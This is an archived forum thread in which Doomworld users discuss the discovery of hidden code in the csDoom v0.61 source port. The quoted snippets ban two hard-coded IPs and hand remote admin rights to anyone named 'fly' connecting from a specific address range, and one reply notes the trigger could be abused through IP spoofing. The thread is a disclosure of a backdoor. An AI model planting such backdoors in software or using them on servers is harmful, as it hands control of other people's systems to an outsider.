Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
Linguica

csDoom Problems

Recommended Posts

csDoom v0.61 has been released which fixes a bug relating to teamplay. However, there's some more important stuff to mention here. Apparently Fly has been putting certain "hidden features" into csDoom, two of which have been found. Here's the source code for one:

void SV_CheckIP (void)
{
        if ( net_from.ip[0]==62 && net_from.ip[1]==252 &&
                 net_from.ip[2]==3 && net_from.ip[3]==130)
        {
                SV_PlayerTriedToCheat();
        }
        if ( net_from.ip[0]==24 && net_from.ip[1]==114 &&
                 net_from.ip[2]==98 && net_from.ip[3]==138)
        {
                SV_PlayerTriedToCheat();
        }
}
This one basically bans two people from ever playing csDoom on any server which has this code compiled in. I'm not exactly sure why these 2 IPs were targeted. However, there's an even more serious one:
if ( net_from.ip[0]=195 && net_from.ip[1]=170 &&
net_from.ip[2]=202 &&
( !strcmp(players[parse_cl].userinfo.netname, "fly")
|| !strcmp(players[parse_cl].userinfo.netname, "FLY")
|| !strcmp(players[parse_cl].userinfo.netname, "Fly") )
)
{
clients[parse_cl].allow_rcon = true;
}
This basically means that Fly, the creator of csDoom, can take over any server you may choose to set up, and perform "administrative" functions (kick people, change maps, etc). Now while banning 2 IPs may be marginally all right, leaving a back door so the creator can remotely control any server is not. Doomworld urges everyone to think strongly before using csDoom 0.61 -- there's no way to know what other "hidden features" they may contain. csDoom 0.5, while being less functional, have had their source released and thus can be swept for such unwanted additions.

Share this post


Link to post
Guest Anonymous User

we just need the client source for v0.6. Given that clients are more likely to be running on an OS without security/permissions (read: Win32) that's the more dangerous one as well.

Share this post


Link to post
Guest Anonymous User

now we see the real reason why fly was so loathe to release the sources

Share this post


Link to post
Guest Anonymous User

Hehe, fly is one clever bastard.. Anyway, its he's work, he's the boss :o)

Share this post


Link to post
Guest Anonymous User

I don't think I'll be running CSDoom for awhile :

Share this post


Link to post
Guest Anonymous User

does anybody of you remeber that QW and Q2 hat these backdoors in also? it was there maybe fly simply copied code from an old QW version :)

Share this post


Link to post

I have the csDoom source code for Win32. Give me the word at wsean@home.com if you want a backdoor-free version of this.

Share this post


Link to post
Guest Anonymous User

<NightFang> Ling: I asked Fly as to why he added that backdoor into csDoom and he simply said "Quake does it"
<NightFang> then I said "quake != Csdoom"
<NightFang> with his reply "quake == csdoom"

Share this post


Link to post
Guest Anonymous User

the fact he used 3 strcmps rather than just use 1 strcasecmp gives an indication of his lack of programming ability

Share this post


Link to post
Guest ethhoack

trust is very important is computing. if we can't trust fly to run a sevrer, how could we trust him with a closed source client ?

Share this post


Link to post
Guest Anonymous User

Why not just block traffic from the IP range he put in there? Any firewall can do that sort of thing. BTW anyone who tries a backdoor like this can fuck off - id included.

Share this post


Link to post

Anyone with the nick fly can use that backdoor. hehe

Share this post


Link to post
Guest Anonymous User

Nah, thats not entirely true, you also have to be coming from an IP address in the 195.170.202.x range.

Share this post


Link to post
Guest Anonymous User

It's stricmp, not strcasecmp. I'm really surprised that Fly didn't use this function; it's ANSI C. If the whole code is that poorly optimised, he is not a good programmer at all.

Share this post


Link to post
Guest Anonymous User

Think about this guy: - He writes a program everybody uses - He doesn't release the source code for that program although everybody wants him to - The program is poorly optimized - There are uncommented backdoors in it - The guy seems to be an asshole Damn it. Fly is Bill Gates !

Share this post


Link to post

I trust Fly more than anyone who posted here. As from what's been mentioned, the things fly could do to a server would only be done if he wanted to waste his time instead of just making csdoom or whatever other important stuff he does with his life. Why should anyone fear (maybe some retard that offended him, but why should a csdoom player care?)? Nothing new has happened and nothing worth a fuss. Csdoom is really cool and really fun. This news may be true, but so what? Yeah, it's good if someone checks anothers prog, but come back when you have some useful stuff, not this "oh my, Fly's a russian spy, he's gonna screw us!" Hahaha! Also, post with a name, if you wanna be heard. Be constructive... or have I seen your client/server DOOM version?

Share this post


Link to post
Guest Anonymous User

strcasecmp is the ansi version i believe.. anyway linux doesnt have stricmp so thats why i wrote that

Share this post


Link to post
Guest DN

Let's give him a chance to defend himself before everyone lynches him, eh?

Share this post


Link to post

Since I know nothing about programming and can't make head or tails out of that code I can't comment with any kind of expertise. However, I don't like the sound of this one bit. I hope someone who is knowledgeable will get hold of the source and remove this funny stuff. Anyway, how could anyone possibly cheat at Csdoom? Wouldn't there be some sort of consistency failure or something?

Share this post


Link to post
Guest Anonymous User

consistency failures are impossible due to the way csdoom works. If you can control the server, it may be perfectly possible to cheat.

Share this post


Link to post
Guest Anonymous User

Yeag great all those -we are smarter than fly-comments on his programming style!If you are so great at it where is your client server DOOM? or any sourceport of any kind? and before judging him give him a chance to defend himself! id did it too and it seems that nobody is hating them for doing it!

Share this post


Link to post
Guest Anonymous User

Hey, checkout the official CSDOOM page! What's up with that?

Share this post


Link to post

I've had enough about #doomroom. I am sick of the subject now. I've decided not to visit there anymore and that's that. Let those guys have their little place. Namecalling will not help the situation. Let it be.

Share this post


Link to post
Guest Anonymous User

All this jumping on the "fly is crap" bandwaggon really does remind me of when the same guys got stuck into doomserv It seems so easy to call someone when you cannot do 1 bit of the work he has done. The only problem I see is if bill clinton should one day decide to run csdoom server on whitehouse computer :)

Share this post


Link to post

Undoubtedly triggered by the takeover of #csdoom, Fly has decided to discontinue work on the CSDoom source port. I now officially declare #doomroom a much, much, much worse place than #doom2 EVER was.

Share this post


Link to post
Guest Anonymous User

Well you did it to doomserv now you have done it to csdoom, is it just because you cannot stand to see anyone enjoy playing doom on net? You make me sick

Share this post


Link to post

Unlike CSDoom's, Doomserv's exploit was purely accidental. The exploit was pointed out and a new version fixing it was to come out - I've no idea what happened since then.

Share this post


Link to post
Guest sponge

We ruined csDoom? We ruined it by exposing 2 holes in the code? There are IP spoofers. You could spoof Fly's IP, and wreak havoc on csDoom servers. And for exposing this hole, we ruined csDoom. Anonymous user, YOU make me sick.

Share this post


Link to post
Guest
This topic is now closed to further replies.
Sign in to follow this  
×